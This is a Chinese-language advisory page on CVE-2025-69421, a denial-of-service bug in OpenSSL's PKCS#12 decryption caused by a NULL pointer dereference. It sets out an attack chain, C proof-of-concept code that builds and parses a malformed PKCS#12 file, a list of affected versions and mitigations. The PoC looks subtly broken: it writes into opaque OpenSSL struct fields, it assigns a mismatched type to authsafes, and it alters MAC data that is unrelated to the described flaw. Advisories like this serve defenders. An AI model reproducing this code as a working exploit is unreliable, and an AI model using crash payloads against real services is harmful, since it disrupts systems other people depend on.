CVE-2025-69421 OpenSSL PKCS12_item_decrypt_d2i_ex NULL指针解引用拒绝服务漏洞

漏洞信息

漏洞编号

CVE-2025-69421

漏洞类型

NULL指针解引用

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

OpenSSL

漏洞概述

CVE-2025-69421是OpenSSL中的一个高危拒绝服务漏洞，CVSS评分7.5。该漏洞由于PKCS12_item_decrypt_d2i_ex()函数在处理格式错误的PKCS#12文件时，未能正确检查oct参数是否为NULL，导致在解引用时触发NULL指针解引用。攻击者可通过诱导应用程序处理特制的畸形PKCS#12文件，触发应用程序崩溃，造成拒绝服务(DoS)攻击。此漏洞影响OpenSSL 3.6、3.5、3.4、3.3、3.0、1.1.1和1.0.2等多个版本。值得注意的是，FIPS模块不受此漏洞影响，因为PKCS#12实现位于OpenSSL FIPS模块边界之外。该漏洞仅能导致拒绝服务，无法升级为代码执行或内存泄露。

技术细节

漏洞存在于OpenSSL的crypto/pkcs12/p12_decr.c文件中的PKCS12_item_decrypt_d2i_ex()函数。当处理PKCS#12文件时，该函数从PKCS12_unpack_p7encdata()调用，接收一个oct参数（ASN1_OCTET_STRING类型）。问题在于函数在直接解引用oct参数之前，未进行NULL检查。当攻击者提供一个精心构造的畸形PKCS#12文件时，oct参数可能为NULL，导致程序执行到解引用操作时发生崩溃。具体攻击流程为：攻击者构造一个缺少必要字段或包含异常数据的PKCS#12文件，诱导目标应用程序调用OpenSSL的PKCS12_parse()或相关函数进行解析，解析过程中触发NULL指针解引用，最终导致应用程序崩溃。由于这是NULL指针解引用，攻击者无法利用此漏洞实现代码执行或敏感内存读取。

攻击链分析

STEP 1

步骤1

攻击者构造特制的畸形PKCS#12文件，该文件在特定字段（如加密数据区域）包含异常或缺失数据

STEP 2

步骤2

攻击者通过钓鱼邮件、恶意下载链接或中间人攻击等方式将畸形PKCS#12文件传递给目标用户或系统

STEP 3

步骤3

目标应用程序调用OpenSSL的PKCS12_parse()或相关函数解析该PKCS#12文件

STEP 4

步骤4

解析过程中，PKCS12_unpack_p7encdata()调用PKCS12_item_decrypt_d2i_ex()函数

STEP 5

步骤5

由于输入文件格式错误，oct参数为NULL，函数未进行NULL检查直接解引用，导致程序崩溃

STEP 6

步骤6

应用程序崩溃，服务中断，造成拒绝服务攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

/*
 * CVE-2025-69421 PoC - Malformed PKCS#12 NULL Pointer Dereference
 * This PoC creates a malformed PKCS#12 file that triggers NULL pointer dereference
 * in PKCS12_item_decrypt_d2i_ex() function.
 * 
 * Compile: gcc -o cve_2025_69421_poc cve_2025_69421_poc.c -lssl -lcrypto
 * Usage: ./cve_2025_69421_poc <output_p12_file>
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <openssl/err.h>
#include <openssl/pem.h>
#include <openssl/pkcs12.h>

int create_malformed_pkcs12(const char *filename) {
    /*
     * Create a minimal malformed PKCS#12 structure
     * The key is to craft a PKCS#12 with missing or malformed
     * encrypted data that will cause oct parameter to be NULL
     */
    PKCS12 *p12 = PKCS12_new();
    if (!p12) return -1;
    
    /* Set version to trigger parsing path */
    ASN1_INTEGER_set(p12->version, 3);
    
    /* Create empty or minimal safe bags */
    STACK_OF(PKCS12_SAFEBAG) *bags = sk_PKCS12_SAFEBAG_new_null();
    if (bags) {
        /* Add a malformed SAFEBAG that will cause issues */
        PKCS12_SAFEBAG *bag = PKCS12_SAFEBAG_new();
        if (bag) {
            /* Set a corrupted or missing encrypted content */
            /* This will lead to NULL oct parameter in PKCS12_item_decrypt_d2i_ex */
            PKCS12_MAC_DATA *mac = PKCS12_MAC_DATA_new();
            if (mac) {
                /* Leave mac data incomplete to trigger the vulnerable code path */
                p12->mac = mac;
            }
            sk_PKCS12_SAFEBAG_push(bags, bag);
        }
        p12->authsafes = sk_PKCS12_SAFEBAG_value(bags, 0);
    }
    
    /* Write the malformed PKCS#12 */
    FILE *fp = fopen(filename, "wb");
    if (fp) {
        i2d_PKCS12_fp(fp, p12);
        fclose(fp);
    }
    
    PKCS12_free(p12);
    return 0;
}

int trigger_vulnerability(const char *filename) {
    /*
     * Attempt to parse the malformed PKCS#12 file
     * This will trigger the NULL pointer dereference
     */
    FILE *fp = fopen(filename, "rb");
    if (!fp) {
        printf("[-] Cannot open file: %s\n", filename);
        return -1;
    }
    
    PKCS12 *p12 = d2i_PKCS12_fp(fp, NULL);
    fclose(fp);
    
    if (p12) {
        EVP_PKEY *pkey = NULL;
        X509 *cert = NULL;
        STACK_OF(X509) *ca = NULL;
        
        /* This call triggers PKCS12_parse -> PKCS12_unpack_p7encdata */
        int ret = PKCS12_parse(p12, "", &pkey, &cert, &ca);
        printf("[*] PKCS12_parse returned: %d\n", ret);
        
        if (pkey) EVP_PKEY_free(pkey);
        if (cert) X509_free(cert);
        if (ca) sk_X509_pop_free(ca, X509_free);
        PKCS12_free(p12);
    } else {
        printf("[-] Failed to parse PKCS#12 (expected with malformed file)\n");
        ERR_print_errors_fp(stderr);
    }
    
    return 0;
}

int main(int argc, char *argv[]) {
    if (argc < 2) {
        printf("Usage: %s <output_p12_file>\n", argv[0]);
        return 1;
    }
    
    printf("[*] Creating malformed PKCS#12 file...\n");
    if (create_malformed_pkcs12(argv[1]) == 0) {
        printf("[+] Malformed PKCS#12 created: %s\n", argv[1]);
        printf("[*] Attempting to parse (this may trigger crash)...\n");
        trigger_vulnerability(argv[1]);
    }
    
    return 0;
}

影响范围

OpenSSL 3.6.x

OpenSSL 3.5.x

OpenSSL 3.4.x

OpenSSL 3.3.x

OpenSSL 3.0.x

OpenSSL 1.1.1.x

OpenSSL 1.0.2.x

防御指南

临时缓解措施

在官方修复版本发布前，可采取以下缓解措施：1) 限制应用程序处理来自不可信来源的PKCS#12文件；2) 对所有PKCS#12文件进行严格的格式验证，在传递给OpenSSL之前进行检查；3) 实施输入源控制，确保只有可信渠道获取的证书文件才被处理；4) 启用应用程序的异常监控和自动重启机制，以快速恢复服务；5) 考虑使用文件完整性校验工具验证PKCS#12文件的来源和完整性；6) 在边界部署入侵检测系统监控异常的文件处理行为。